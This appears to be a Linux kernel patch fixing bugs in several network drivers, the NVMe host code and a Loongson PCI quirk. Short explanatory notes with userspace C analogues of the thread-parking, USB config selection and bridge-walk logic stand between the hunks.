+index 65e20693c549e..33f4f58ee51c6 100644
+--- a/drivers/net/ethernet/qlogic/qed/qed_cxt.c
++++ b/drivers/net/ethernet/qlogic/qed/qed_cxt.c
+@@ -933,6 +933,7 @@ static void qed_ilt_shadow_free(struct qed_hwfn *p_hwfn)
+ 		p_dma->virt_addr = NULL;
+ 	}
+ 	kfree(p_mngr->ilt_shadow);
++	p_mngr->ilt_shadow = NULL;
+ }
+ 
+ static int qed_ilt_blk_alloc(struct qed_hwfn *p_hwfn,
+diff --git a/drivers/net/ethernet/qlogic/qlcnic/qlcnic_io.c b/drivers/net/ethernet/qlogic/qlcnic/qlcnic_io.c
+index 92930a055cbcc..41894d154013b 100644
+--- a/drivers/net/ethernet/qlogic/qlcnic/qlcnic_io.c
++++ b/drivers/net/ethernet/qlogic/qlcnic/qlcnic_io.c
+@@ -318,7 +318,7 @@ static void qlcnic_send_filter(struct qlcnic_adapter *adapter,
+ 
+ 	if (adapter->flags & QLCNIC_VLAN_FILTERING) {
+ 		if (protocol == ETH_P_8021Q) {
+-			vh = (struct vlan_ethhdr *)skb->data;
++			vh = skb_vlan_eth_hdr(skb);
+ 			vlan_id = ntohs(vh->h_vlan_TCI);
+ 		} else if (skb_vlan_tag_present(skb)) {
+ 			vlan_id = skb_vlan_tag_get(skb);
+@@ -468,7 +468,7 @@ static int qlcnic_tx_pkt(struct qlcnic_adapter *adapter,
+ 	u32 producer = tx_ring->producer;
+ 
+ 	if (protocol == ETH_P_8021Q) {
+-		vh = (struct vlan_ethhdr *)skb->data;
++		vh = skb_vlan_eth_hdr(skb);
+ 		flags = QLCNIC_FLAGS_VLAN_TAGGED;
+ 		vlan_tci = ntohs(vh->h_vlan_TCI);
+ 		protocol = ntohs(vh->h_vlan_encapsulated_proto);
+diff --git a/drivers/net/ethernet/qualcomm/qca_debug.c b/drivers/net/ethernet/qualcomm/qca_debug.c
+index f62c39544e086..a739c06ede4e7 100644
+--- a/drivers/net/ethernet/qualcomm/qca_debug.c
++++ b/drivers/net/ethernet/qualcomm/qca_debug.c
+@@ -30,6 +30,8 @@
+ 
+ #define QCASPI_MAX_REGS 0x20
+ 
++#define QCASPI_RX_MAX_FRAMES 4
++
+ static const u16 qcaspi_spi_regs[] = {
+ 	SPI_REG_BFR_SIZE,
+ 	SPI_REG_WRBUF_SPC_AVA,
+@@ -252,9 +254,9 @@ qcaspi_get_ringparam(struct net_device *dev, struct ethtool_ringparam *ring,
+ {
+ 	struct qcaspi *qca = netdev_priv(dev);
+ 
+-	ring->rx_max_pending = 4;
++	ring->rx_max_pending = QCASPI_RX_MAX_FRAMES;
+ 	ring->tx_max_pending = TX_RING_MAX_LEN;
+-	ring->rx_pending = 4;
++	ring->rx_pending = QCASPI_RX_MAX_FRAMES;
+ 	ring->tx_pending = qca->txr.count;
+ }
+ 
+@@ -263,22 +265,21 @@ qcaspi_set_ringparam(struct net_device *dev, struct ethtool_ringparam *ring,
+ 		     struct kernel_ethtool_ringparam *kernel_ring,
+ 		     struct netlink_ext_ack *extack)
+ {
+-	const struct net_device_ops *ops = dev->netdev_ops;
+ 	struct qcaspi *qca = netdev_priv(dev);
+ 
+-	if ((ring->rx_pending) ||
++	if (ring->rx_pending != QCASPI_RX_MAX_FRAMES ||
+ 	    (ring->rx_mini_pending) ||
+ 	    (ring->rx_jumbo_pending))
+ 		return -EINVAL;
+ 
+-	if (netif_running(dev))
+-		ops->ndo_stop(dev);
++	if (qca->spi_thread)
++		kthread_park(qca->spi_thread);
+ 
+ 	qca->txr.count = max_t(u32, ring->tx_pending, TX_RING_MIN_LEN);
+ 	qca->txr.count = min_t(u16, qca->txr.count, TX_RING_MAX_LEN);
+ 
+-	if (netif_running(dev))
+-		ops->ndo_open(dev);
++	if (qca->spi_thread)
++		kthread_unpark(qca->spi_thread);
+ 
+ 	return 0;
+ }
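
Instead of bouncing the whole interface through ndo_stop/ndo_open, the hunk above parks the SPI worker, resizes the TX ring while the thread is quiescent, then unparks it. A rough userspace analogue using two atomic flags; kthread_park()/kthread_parkme() have no direct pthread equivalent, so treat this only as an approximation of the handshake.

#include <pthread.h>
#include <stdatomic.h>
#include <unistd.h>

static atomic_int park_requested, parked, stop;
static int tx_ring_len = 4;	/* the resource the worker must not touch */

static void *spi_worker(void *arg)
{
	(void)arg;
	while (!atomic_load(&stop)) {
		if (atomic_load(&park_requested)) {
			atomic_store(&parked, 1);	/* quiesced */
			while (atomic_load(&park_requested))
				usleep(1000);		/* wait for unpark */
			atomic_store(&parked, 0);
		}
		/* ... move frames through the TX ring here ... */
		usleep(100);
	}
	return NULL;
}

int main(void)
{
	pthread_t t;

	pthread_create(&t, NULL, spi_worker, NULL);

	atomic_store(&park_requested, 1);	/* ask the worker to park */
	while (!atomic_load(&parked))
		usleep(1000);
	tx_ring_len = 8;			/* safe: worker is quiescent */
	atomic_store(&park_requested, 0);	/* unpark */

	atomic_store(&stop, 1);
	pthread_join(t, NULL);
	return tx_ring_len == 8 ? 0 : 1;
}
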
+diff --git a/drivers/net/ethernet/qualcomm/qca_spi.c b/drivers/net/ethernet/qualcomm/qca_spi.c
+index 4a1b94e5a8ea9..82f5173a2cfd5 100644
+--- a/drivers/net/ethernet/qualcomm/qca_spi.c
++++ b/drivers/net/ethernet/qualcomm/qca_spi.c
+@@ -581,6 +581,18 @@ qcaspi_spi_thread(void *data)
+ 	netdev_info(qca->net_dev, "SPI thread created\n");
+ 	while (!kthread_should_stop()) {
+ 		set_current_state(TASK_INTERRUPTIBLE);
++		if (kthread_should_park()) {
++			netif_tx_disable(qca->net_dev);
++			netif_carrier_off(qca->net_dev);
++			qcaspi_flush_tx_ring(qca);
++			kthread_parkme();
++			if (qca->sync == QCASPI_SYNC_READY) {
++				netif_carrier_on(qca->net_dev);
++				netif_wake_queue(qca->net_dev);
++			}
++			continue;
++		}
++
+ 		if ((qca->intr_req == qca->intr_svc) &&
+ 		    !qca->txr.skb[qca->txr.head])
+ 			schedule();
+@@ -609,11 +621,17 @@ qcaspi_spi_thread(void *data)
+ 			if (intr_cause & SPI_INT_CPU_ON) {
+ 				qcaspi_qca7k_sync(qca, QCASPI_EVENT_CPUON);
+ 
++				/* Frame decoding in progress */
++				if (qca->frm_handle.state != qca->frm_handle.init)
++					qca->net_dev->stats.rx_dropped++;
++
++				qcafrm_fsm_init_spi(&qca->frm_handle);
++				qca->stats.device_reset++;
++
+ 				/* not synced. */
+ 				if (qca->sync != QCASPI_SYNC_READY)
+ 					continue;
+ 
+-				qca->stats.device_reset++;
+ 				netif_wake_queue(qca->net_dev);
+ 				netif_carrier_on(qca->net_dev);
+ 			}
+diff --git a/drivers/net/ethernet/sfc/tx_tso.c b/drivers/net/ethernet/sfc/tx_tso.c
+index 898e5c61d9086..d381d8164f07c 100644
+--- a/drivers/net/ethernet/sfc/tx_tso.c
++++ b/drivers/net/ethernet/sfc/tx_tso.c
+@@ -147,7 +147,7 @@ static __be16 efx_tso_check_protocol(struct sk_buff *skb)
+ 	EFX_WARN_ON_ONCE_PARANOID(((struct ethhdr *)skb->data)->h_proto !=
+ 				  protocol);
+ 	if (protocol == htons(ETH_P_8021Q)) {
+-		struct vlan_ethhdr *veh = (struct vlan_ethhdr *)skb->data;
++		struct vlan_ethhdr *veh = skb_vlan_eth_hdr(skb);
+ 
+ 		protocol = veh->h_vlan_encapsulated_proto;
+ 	}
+diff --git a/drivers/net/ethernet/stmicro/stmmac/Kconfig b/drivers/net/ethernet/stmicro/stmmac/Kconfig
+index 31ff351740342..58091ee2bfe60 100644
+--- a/drivers/net/ethernet/stmicro/stmmac/Kconfig
++++ b/drivers/net/ethernet/stmicro/stmmac/Kconfig
+@@ -256,7 +256,7 @@ config DWMAC_INTEL
+ config DWMAC_LOONGSON
+ 	tristate "Loongson PCI DWMAC support"
+ 	default MACH_LOONGSON64
+-	depends on STMMAC_ETH && PCI
++	depends on (MACH_LOONGSON64 || COMPILE_TEST) && STMMAC_ETH && PCI
+ 	depends on COMMON_CLK
+ 	help
+ 	  This selects the LOONGSON PCI bus support for the stmmac driver,
+diff --git a/drivers/net/ethernet/stmicro/stmmac/dwmac-loongson.c b/drivers/net/ethernet/stmicro/stmmac/dwmac-loongson.c
+index a25c187d31853..49c7aa86faaa8 100644
+--- a/drivers/net/ethernet/stmicro/stmmac/dwmac-loongson.c
++++ b/drivers/net/ethernet/stmicro/stmmac/dwmac-loongson.c
+@@ -68,17 +68,15 @@ static int loongson_dwmac_probe(struct pci_dev *pdev, const struct pci_device_id
+ 	if (!plat)
+ 		return -ENOMEM;
+ 
++	plat->mdio_bus_data = devm_kzalloc(&pdev->dev,
++					   sizeof(*plat->mdio_bus_data),
++					   GFP_KERNEL);
++	if (!plat->mdio_bus_data)
++		return -ENOMEM;
++
+ 	plat->mdio_node = of_get_child_by_name(np, "mdio");
+ 	if (plat->mdio_node) {
+ 		dev_info(&pdev->dev, "Found MDIO subnode\n");
+-
+-		plat->mdio_bus_data = devm_kzalloc(&pdev->dev,
+-						   sizeof(*plat->mdio_bus_data),
+-						   GFP_KERNEL);
+-		if (!plat->mdio_bus_data) {
+-			ret = -ENOMEM;
+-			goto err_put_node;
+-		}
+ 		plat->mdio_bus_data->needs_reset = true;
+ 	}
+ 
+diff --git a/drivers/net/ethernet/stmicro/stmmac/stmmac_main.c b/drivers/net/ethernet/stmicro/stmmac/stmmac_main.c
+index 69aac8ed84f67..deb6e95a1bca6 100644
+--- a/drivers/net/ethernet/stmicro/stmmac/stmmac_main.c
++++ b/drivers/net/ethernet/stmicro/stmmac/stmmac_main.c
+@@ -4566,13 +4566,10 @@ dma_map_err:
+ 
+ static void stmmac_rx_vlan(struct net_device *dev, struct sk_buff *skb)
+ {
+-	struct vlan_ethhdr *veth;
+-	__be16 vlan_proto;
++	struct vlan_ethhdr *veth = skb_vlan_eth_hdr(skb);
++	__be16 vlan_proto = veth->h_vlan_proto;
+ 	u16 vlanid;
+ 
+-	veth = (struct vlan_ethhdr *)skb->data;
+-	vlan_proto = veth->h_vlan_proto;
+-
+ 	if ((vlan_proto == htons(ETH_P_8021Q) &&
+ 	     dev->features & NETIF_F_HW_VLAN_CTAG_RX) ||
+ 	    (vlan_proto == htons(ETH_P_8021AD) &&
+diff --git a/drivers/net/ethernet/stmicro/stmmac/stmmac_mdio.c b/drivers/net/ethernet/stmicro/stmmac/stmmac_mdio.c
+index 5f177ea807258..379fc887ddf46 100644
+--- a/drivers/net/ethernet/stmicro/stmmac/stmmac_mdio.c
++++ b/drivers/net/ethernet/stmicro/stmmac/stmmac_mdio.c
+@@ -483,7 +483,11 @@ int stmmac_mdio_register(struct net_device *ndev)
+ 	new_bus->parent = priv->device;
+ 
+ 	err = of_mdiobus_register(new_bus, mdio_node);
+-	if (err != 0) {
++	if (err == -ENODEV) {
++		err = 0;
++		dev_info(dev, "MDIO bus is disabled\n");
++		goto bus_register_fail;
++	} else if (err) {
+ 		dev_err_probe(dev, err, "Cannot register the MDIO bus\n");
+ 		goto bus_register_fail;
+ 	}
+diff --git a/drivers/net/team/team.c b/drivers/net/team/team.c
+index 556b2d1cd2aca..293eaf6b3ec9e 100644
+--- a/drivers/net/team/team.c
++++ b/drivers/net/team/team.c
+@@ -285,8 +285,10 @@ static int __team_options_register(struct team *team,
+ 	return 0;
+ 
+ inst_rollback:
+-	for (i--; i >= 0; i--)
++	for (i--; i >= 0; i--) {
+ 		__team_option_inst_del_option(team, dst_opts[i]);
++		list_del(&dst_opts[i]->list);
++	}
+ 
+ 	i = option_count;
+ alloc_rollback:
+diff --git a/drivers/net/usb/aqc111.c b/drivers/net/usb/aqc111.c
+index a017e9de2119d..7b8afa589a53c 100644
+--- a/drivers/net/usb/aqc111.c
++++ b/drivers/net/usb/aqc111.c
+@@ -1079,17 +1079,17 @@ static int aqc111_rx_fixup(struct usbnet *dev, struct sk_buff *skb)
+ 	u16 pkt_count = 0;
+ 	u64 desc_hdr = 0;
+ 	u16 vlan_tag = 0;
+-	u32 skb_len = 0;
++	u32 skb_len;
+ 
+ 	if (!skb)
+ 		goto err;
+ 
+-	if (skb->len == 0)
++	skb_len = skb->len;
++	if (skb_len < sizeof(desc_hdr))
+ 		goto err;
+ 
+-	skb_len = skb->len;
+ 	/* RX Descriptor Header */
+-	skb_trim(skb, skb->len - sizeof(desc_hdr));
++	skb_trim(skb, skb_len - sizeof(desc_hdr));
+ 	desc_hdr = le64_to_cpup((u64 *)skb_tail_pointer(skb));
+ 
+ 	/* Check these packets */
+diff --git a/drivers/net/usb/qmi_wwan.c b/drivers/net/usb/qmi_wwan.c
+index 4fb981b8732ef..2d82481d34e6b 100644
+--- a/drivers/net/usb/qmi_wwan.c
++++ b/drivers/net/usb/qmi_wwan.c
+@@ -1288,6 +1288,7 @@ static const struct usb_device_id products[] = {
+ 	{QMI_FIXED_INTF(0x19d2, 0x0168, 4)},
+ 	{QMI_FIXED_INTF(0x19d2, 0x0176, 3)},
+ 	{QMI_FIXED_INTF(0x19d2, 0x0178, 3)},
++	{QMI_FIXED_INTF(0x19d2, 0x0189, 4)},    /* ZTE MF290 */
+ 	{QMI_FIXED_INTF(0x19d2, 0x0191, 4)},	/* ZTE EuFi890 */
+ 	{QMI_FIXED_INTF(0x19d2, 0x0199, 1)},	/* ZTE MF820S */
+ 	{QMI_FIXED_INTF(0x19d2, 0x0200, 1)},
+diff --git a/drivers/net/usb/r8152.c b/drivers/net/usb/r8152.c
+index 4d833781294a4..958a02b19554d 100644
+--- a/drivers/net/usb/r8152.c
++++ b/drivers/net/usb/r8152.c
+@@ -8288,43 +8288,6 @@ static bool rtl_check_vendor_ok(struct usb_interface *intf)
+ 	return true;
+ }
+ 
+-static bool rtl_vendor_mode(struct usb_interface *intf)
+-{
+-	struct usb_host_interface *alt = intf->cur_altsetting;
+-	struct usb_device *udev;
+-	struct usb_host_config *c;
+-	int i, num_configs;
+-
+-	if (alt->desc.bInterfaceClass == USB_CLASS_VENDOR_SPEC)
+-		return rtl_check_vendor_ok(intf);
+-
+-	/* The vendor mode is not always config #1, so to find it out. */
+-	udev = interface_to_usbdev(intf);
+-	c = udev->config;
+-	num_configs = udev->descriptor.bNumConfigurations;
+-	if (num_configs < 2)
+-		return false;
+-
+-	for (i = 0; i < num_configs; (i++, c++)) {
+-		struct usb_interface_descriptor	*desc = NULL;
+-
+-		if (c->desc.bNumInterfaces > 0)
+-			desc = &c->intf_cache[0]->altsetting->desc;
+-		else
+-			continue;
+-
+-		if (desc->bInterfaceClass == USB_CLASS_VENDOR_SPEC) {
+-			usb_driver_set_configuration(udev, c->desc.bConfigurationValue);
+-			break;
+-		}
+-	}
+-
+-	if (i == num_configs)
+-		dev_err(&intf->dev, "Unexpected Device\n");
+-
+-	return false;
+-}
+-
+ static int rtl8152_pre_reset(struct usb_interface *intf)
+ {
+ 	struct r8152 *tp = usb_get_intfdata(intf);
+@@ -9556,9 +9519,8 @@ static int rtl_fw_init(struct r8152 *tp)
+ 	return 0;
+ }
+ 
+-u8 rtl8152_get_version(struct usb_interface *intf)
++static u8 __rtl_get_hw_ver(struct usb_device *udev)
+ {
+-	struct usb_device *udev = interface_to_usbdev(intf);
+ 	u32 ocp_data = 0;
+ 	__le32 *tmp;
+ 	u8 version;
+@@ -9628,10 +9590,19 @@ u8 rtl8152_get_version(struct usb_interface *intf)
+ 		break;
+ 	default:
+ 		version = RTL_VER_UNKNOWN;
+-		dev_info(&intf->dev, "Unknown version 0x%04x\n", ocp_data);
++		dev_info(&udev->dev, "Unknown version 0x%04x\n", ocp_data);
+ 		break;
+ 	}
+ 
++	return version;
++}
++
++u8 rtl8152_get_version(struct usb_interface *intf)
++{
++	u8 version;
++
++	version = __rtl_get_hw_ver(interface_to_usbdev(intf));
++
+ 	dev_dbg(&intf->dev, "Detected version 0x%04x\n", version);
+ 
+ 	return version;
+@@ -9675,7 +9646,10 @@ static int rtl8152_probe(struct usb_interface *intf,
+ 	if (version == RTL_VER_UNKNOWN)
+ 		return -ENODEV;
+ 
+-	if (!rtl_vendor_mode(intf))
++	if (intf->cur_altsetting->desc.bInterfaceClass != USB_CLASS_VENDOR_SPEC)
++		return -ENODEV;
++
++	if (!rtl_check_vendor_ok(intf))
+ 		return -ENODEV;
+ 
+ 	usb_reset_device(udev);
+@@ -9875,43 +9849,37 @@ static void rtl8152_disconnect(struct usb_interface *intf)
+ 	}
+ }
+ 
+-#define REALTEK_USB_DEVICE(vend, prod)	{ \
+-	USB_DEVICE_INTERFACE_CLASS(vend, prod, USB_CLASS_VENDOR_SPEC), \
+-}, \
+-{ \
+-	USB_DEVICE_AND_INTERFACE_INFO(vend, prod, USB_CLASS_COMM, \
+-			USB_CDC_SUBCLASS_ETHERNET, USB_CDC_PROTO_NONE), \
+-}
+-
+ /* table of devices that work with this driver */
+ static const struct usb_device_id rtl8152_table[] = {
+ 	/* Realtek */
+-	REALTEK_USB_DEVICE(VENDOR_ID_REALTEK, 0x8050),
+-	REALTEK_USB_DEVICE(VENDOR_ID_REALTEK, 0x8053),
+-	REALTEK_USB_DEVICE(VENDOR_ID_REALTEK, 0x8152),
+-	REALTEK_USB_DEVICE(VENDOR_ID_REALTEK, 0x8153),
+-	REALTEK_USB_DEVICE(VENDOR_ID_REALTEK, 0x8155),
+-	REALTEK_USB_DEVICE(VENDOR_ID_REALTEK, 0x8156),
++	{ USB_DEVICE(VENDOR_ID_REALTEK, 0x8050) },
++	{ USB_DEVICE(VENDOR_ID_REALTEK, 0x8053) },
++	{ USB_DEVICE(VENDOR_ID_REALTEK, 0x8152) },
++	{ USB_DEVICE(VENDOR_ID_REALTEK, 0x8153) },
++	{ USB_DEVICE(VENDOR_ID_REALTEK, 0x8155) },
++	{ USB_DEVICE(VENDOR_ID_REALTEK, 0x8156) },
+ 
+ 	/* Microsoft */
+-	REALTEK_USB_DEVICE(VENDOR_ID_MICROSOFT, 0x07ab),
+-	REALTEK_USB_DEVICE(VENDOR_ID_MICROSOFT, 0x07c6),
+-	REALTEK_USB_DEVICE(VENDOR_ID_MICROSOFT, 0x0927),
+-	REALTEK_USB_DEVICE(VENDOR_ID_MICROSOFT, 0x0c5e),
+-	REALTEK_USB_DEVICE(VENDOR_ID_SAMSUNG, 0xa101),
+-	REALTEK_USB_DEVICE(VENDOR_ID_LENOVO,  0x304f),
+-	REALTEK_USB_DEVICE(VENDOR_ID_LENOVO,  0x3054),
+-	REALTEK_USB_DEVICE(VENDOR_ID_LENOVO,  0x3062),
+-	REALTEK_USB_DEVICE(VENDOR_ID_LENOVO,  0x3069),
+-	REALTEK_USB_DEVICE(VENDOR_ID_LENOVO,  0x3082),
+-	REALTEK_USB_DEVICE(VENDOR_ID_LENOVO,  0x7205),
+-	REALTEK_USB_DEVICE(VENDOR_ID_LENOVO,  0x720c),
+-	REALTEK_USB_DEVICE(VENDOR_ID_LENOVO,  0x7214),
+-	REALTEK_USB_DEVICE(VENDOR_ID_LENOVO,  0x721e),
+-	REALTEK_USB_DEVICE(VENDOR_ID_LENOVO,  0xa387),
+-	REALTEK_USB_DEVICE(VENDOR_ID_LINKSYS, 0x0041),
+-	REALTEK_USB_DEVICE(VENDOR_ID_NVIDIA,  0x09ff),
+-	REALTEK_USB_DEVICE(VENDOR_ID_TPLINK,  0x0601),
++	{ USB_DEVICE(VENDOR_ID_MICROSOFT, 0x07ab) },
++	{ USB_DEVICE(VENDOR_ID_MICROSOFT, 0x07c6) },
++	{ USB_DEVICE(VENDOR_ID_MICROSOFT, 0x0927) },
++	{ USB_DEVICE(VENDOR_ID_MICROSOFT, 0x0c5e) },
++	{ USB_DEVICE(VENDOR_ID_SAMSUNG, 0xa101) },
++	{ USB_DEVICE(VENDOR_ID_LENOVO,  0x304f) },
++	{ USB_DEVICE(VENDOR_ID_LENOVO,  0x3054) },
++	{ USB_DEVICE(VENDOR_ID_LENOVO,  0x3062) },
++	{ USB_DEVICE(VENDOR_ID_LENOVO,  0x3069) },
++	{ USB_DEVICE(VENDOR_ID_LENOVO,  0x3082) },
++	{ USB_DEVICE(VENDOR_ID_LENOVO,  0x7205) },
++	{ USB_DEVICE(VENDOR_ID_LENOVO,  0x720c) },
++	{ USB_DEVICE(VENDOR_ID_LENOVO,  0x7214) },
++	{ USB_DEVICE(VENDOR_ID_LENOVO,  0x721e) },
++	{ USB_DEVICE(VENDOR_ID_LENOVO,  0xa387) },
++	{ USB_DEVICE(VENDOR_ID_LINKSYS, 0x0041) },
++	{ USB_DEVICE(VENDOR_ID_NVIDIA,  0x09ff) },
++	{ USB_DEVICE(VENDOR_ID_TPLINK,  0x0601) },
++	{ USB_DEVICE(VENDOR_ID_DLINK,   0xb301) },
++	{ USB_DEVICE(VENDOR_ID_ASUS,    0x1976) },
+ 	{}
+ };
+ 
+@@ -9931,7 +9899,68 @@ static struct usb_driver rtl8152_driver = {
+ 	.disable_hub_initiated_lpm = 1,
+ };
+ 
+-module_usb_driver(rtl8152_driver);
++static int rtl8152_cfgselector_probe(struct usb_device *udev)
++{
++	struct usb_host_config *c;
++	int i, num_configs;
++
++	/* Switch the device to vendor mode, if and only if the vendor mode
++	 * driver supports it.
++	 */
++	if (__rtl_get_hw_ver(udev) == RTL_VER_UNKNOWN)
++		return 0;
++
++	/* The vendor mode is not always config #1, so we have to find it. */
++	c = udev->config;
++	num_configs = udev->descriptor.bNumConfigurations;
++	for (i = 0; i < num_configs; (i++, c++)) {
++		struct usb_interface_descriptor	*desc = NULL;
++
++		if (!c->desc.bNumInterfaces)
++			continue;
++		desc = &c->intf_cache[0]->altsetting->desc;
++		if (desc->bInterfaceClass == USB_CLASS_VENDOR_SPEC)
++			break;
++	}
++
++	if (i == num_configs)
++		return -ENODEV;
++
++	if (usb_set_configuration(udev, c->desc.bConfigurationValue)) {
++		dev_err(&udev->dev, "Failed to set configuration %d\n",
++			c->desc.bConfigurationValue);
++		return -ENODEV;
++	}
++
++	return 0;
++}
++
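
rtl8152_cfgselector_probe() scans the device's configurations for the first one whose leading interface is vendor-specific and selects it, replacing the old rtl_vendor_mode() logic. The descriptor walk reduces to a first-match search; a sketch over plain structs, where the struct layout is invented for illustration and is not the USB core's:

#include <stdio.h>

#define USB_CLASS_VENDOR_SPEC 0xff

struct cfg {
	int value;		/* like bConfigurationValue */
	int num_intf;		/* like bNumInterfaces */
	int first_intf_class;	/* class of interface 0 */
};

/* Return the value of the first vendor-specific config, or -1. */
static int find_vendor_config(const struct cfg *c, int n)
{
	for (int i = 0; i < n; i++) {
		if (!c[i].num_intf)
			continue;
		if (c[i].first_intf_class == USB_CLASS_VENDOR_SPEC)
			return c[i].value;
	}
	return -1;
}

int main(void)
{
	struct cfg cfgs[] = {
		{ 1, 1, 0x02 /* CDC */ },
		{ 2, 1, USB_CLASS_VENDOR_SPEC },
	};

	printf("vendor config: %d\n", find_vendor_config(cfgs, 2));	/* 2 */
	return 0;
}
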
++static struct usb_device_driver rtl8152_cfgselector_driver = {
++	.name =		MODULENAME "-cfgselector",
++	.probe =	rtl8152_cfgselector_probe,
++	.id_table =	rtl8152_table,
++	.generic_subclass = 1,
++	.supports_autosuspend = 1,
++};
++
++static int __init rtl8152_driver_init(void)
++{
++	int ret;
++
++	ret = usb_register_device_driver(&rtl8152_cfgselector_driver, THIS_MODULE);
++	if (ret)
++		return ret;
++	return usb_register(&rtl8152_driver);
++}
++
++static void __exit rtl8152_driver_exit(void)
++{
++	usb_deregister(&rtl8152_driver);
++	usb_deregister_device_driver(&rtl8152_cfgselector_driver);
++}
++
++module_init(rtl8152_driver_init);
++module_exit(rtl8152_driver_exit);
+ 
+ MODULE_AUTHOR(DRIVER_AUTHOR);
+ MODULE_DESCRIPTION(DRIVER_DESC);
+diff --git a/drivers/nvme/host/auth.c b/drivers/nvme/host/auth.c
+index 9dfd3d0293054..69aef668f1056 100644
+--- a/drivers/nvme/host/auth.c
++++ b/drivers/nvme/host/auth.c
+@@ -834,6 +834,8 @@ static void nvme_queue_auth_work(struct work_struct *work)
+ 	}
+ 
+ fail2:
++	if (chap->status == 0)
++		chap->status = NVME_AUTH_DHCHAP_FAILURE_FAILED;
+ 	dev_dbg(ctrl->device, "%s: qid %d send failure2, status %x\n",
+ 		__func__, chap->qid, chap->status);
+ 	tl = nvme_auth_set_dhchap_failure2_data(ctrl, chap);
+diff --git a/drivers/nvme/host/core.c b/drivers/nvme/host/core.c
+index 5b156c5bc04a5..eb7c87b344b8f 100644
+--- a/drivers/nvme/host/core.c
++++ b/drivers/nvme/host/core.c
+@@ -1845,16 +1845,18 @@ set_pi:
+ 	return ret;
+ }
+ 
+-static void nvme_configure_metadata(struct nvme_ns *ns, struct nvme_id_ns *id)
++static int nvme_configure_metadata(struct nvme_ns *ns, struct nvme_id_ns *id)
+ {
+ 	struct nvme_ctrl *ctrl = ns->ctrl;
++	int ret;
+ 
+-	if (nvme_init_ms(ns, id))
+-		return;
++	ret = nvme_init_ms(ns, id);
++	if (ret)
++		return ret;
+ 
+ 	ns->features &= ~(NVME_NS_METADATA_SUPPORTED | NVME_NS_EXT_LBAS);
+ 	if (!ns->ms || !(ctrl->ops->flags & NVME_F_METADATA_SUPPORTED))
+-		return;
++		return 0;
+ 
+ 	if (ctrl->ops->flags & NVME_F_FABRICS) {
+ 		/*
+@@ -1863,7 +1865,7 @@ static void nvme_configure_metadata(struct nvme_ns *ns, struct nvme_id_ns *id)
+ 		 * remap the separate metadata buffer from the block layer.
+ 		 */
+ 		if (WARN_ON_ONCE(!(id->flbas & NVME_NS_FLBAS_META_EXT)))
+-			return;
++			return 0;
+ 
+ 		ns->features |= NVME_NS_EXT_LBAS;
+ 
+@@ -1890,6 +1892,7 @@ static void nvme_configure_metadata(struct nvme_ns *ns, struct nvme_id_ns *id)
+ 		else
+ 			ns->features |= NVME_NS_METADATA_SUPPORTED;
+ 	}
++	return 0;
+ }
+ 
+ static void nvme_set_queue_limits(struct nvme_ctrl *ctrl,
+@@ -2070,7 +2073,11 @@ static int nvme_update_ns_info_block(struct nvme_ns *ns,
+ 	ns->lba_shift = id->lbaf[lbaf].ds;
+ 	nvme_set_queue_limits(ns->ctrl, ns->queue);
+ 
+-	nvme_configure_metadata(ns, id);
++	ret = nvme_configure_metadata(ns, id);
++	if (ret < 0) {
++		blk_mq_unfreeze_queue(ns->disk->queue);
++		goto out;
++	}
+ 	nvme_set_chunk_sectors(ns, id);
+ 	nvme_update_disk_info(ns->disk, ns, id);
+ 
+diff --git a/drivers/pci/controller/pci-loongson.c b/drivers/pci/controller/pci-loongson.c
+index fe0f732f6e434..a860f25473df6 100644
+--- a/drivers/pci/controller/pci-loongson.c
++++ b/drivers/pci/controller/pci-loongson.c
+@@ -80,13 +80,49 @@ DECLARE_PCI_FIXUP_EARLY(PCI_VENDOR_ID_LOONGSON,
+ DECLARE_PCI_FIXUP_EARLY(PCI_VENDOR_ID_LOONGSON,
+ 			DEV_LS7A_LPC, system_bus_quirk);
+ 
++/*
++ * Some Loongson PCIe ports have a hardware limit on their Maximum Read
++ * Request Size and cannot handle read requests above it. Sane firmware
++ * sets a proper MRRS at boot, so bridges only need no_inc_mrrs. However,
++ * some MIPS Loongson firmware doesn't set MRRS properly, so we have to
++ * enforce the maximum safe MRRS, which is 256 bytes.
++ */
++#ifdef CONFIG_MIPS
++static void loongson_set_min_mrrs_quirk(struct pci_dev *pdev)
++{
++	struct pci_bus *bus = pdev->bus;
++	struct pci_dev *bridge;
++	static const struct pci_device_id bridge_devids[] = {
++		{ PCI_VDEVICE(LOONGSON, DEV_LS2K_PCIE_PORT0) },
++		{ PCI_VDEVICE(LOONGSON, DEV_LS7A_PCIE_PORT0) },
++		{ PCI_VDEVICE(LOONGSON, DEV_LS7A_PCIE_PORT1) },
++		{ PCI_VDEVICE(LOONGSON, DEV_LS7A_PCIE_PORT2) },
++		{ PCI_VDEVICE(LOONGSON, DEV_LS7A_PCIE_PORT3) },
++		{ PCI_VDEVICE(LOONGSON, DEV_LS7A_PCIE_PORT4) },
++		{ PCI_VDEVICE(LOONGSON, DEV_LS7A_PCIE_PORT5) },
++		{ PCI_VDEVICE(LOONGSON, DEV_LS7A_PCIE_PORT6) },
++		{ 0, },
++	};
++
++	/* look for the matching bridge */
++	while (!pci_is_root_bus(bus)) {
++		bridge = bus->self;
++		bus = bus->parent;
++
++		if (pci_match_id(bridge_devids, bridge)) {
++			if (pcie_get_readrq(pdev) > 256) {
++				pci_info(pdev, "limiting MRRS to 256\n");
++				pcie_set_readrq(pdev, 256);
++			}
++			break;
++		}
++	}
++}
++DECLARE_PCI_FIXUP_ENABLE(PCI_ANY_ID, PCI_ANY_ID, loongson_set_min_mrrs_quirk);
++#endif
++
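
The quirk above walks pdev->bus upward until it finds an ancestor bridge listed in the ID table, then clamps the MRRS. Stripped of the PCI specifics, that is a parent-chain search against a small match table; a self-contained sketch with hypothetical device IDs:

#include <stdbool.h>
#include <stdio.h>

struct dev { unsigned short vendor, device; struct dev *parent; };
struct id { unsigned short vendor, device; };

static bool match_any(const struct dev *d, const struct id *ids, int n)
{
	for (int i = 0; i < n; i++)
		if (d->vendor == ids[i].vendor && d->device == ids[i].device)
			return true;
	return false;
}

/* Walk towards the root; true if any ancestor is in the table. */
static bool behind_limited_bridge(const struct dev *d,
				  const struct id *ids, int n)
{
	for (const struct dev *p = d->parent; p; p = p->parent)
		if (match_any(p, ids, n))
			return true;
	return false;
}

int main(void)
{
	struct dev port = { 0x0014, 0x7a09, NULL };	/* hypothetical bridge */
	struct dev nic = { 0x8086, 0x1533, &port };	/* hypothetical endpoint */
	struct id limited[] = { { 0x0014, 0x7a09 } };

	printf("%d\n", behind_limited_bridge(&nic, limited, 1));	/* 1 */
	return 0;
}
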
+ static void loongson_mrrs_quirk(struct pci_dev *pdev)
+ {
+-	/*
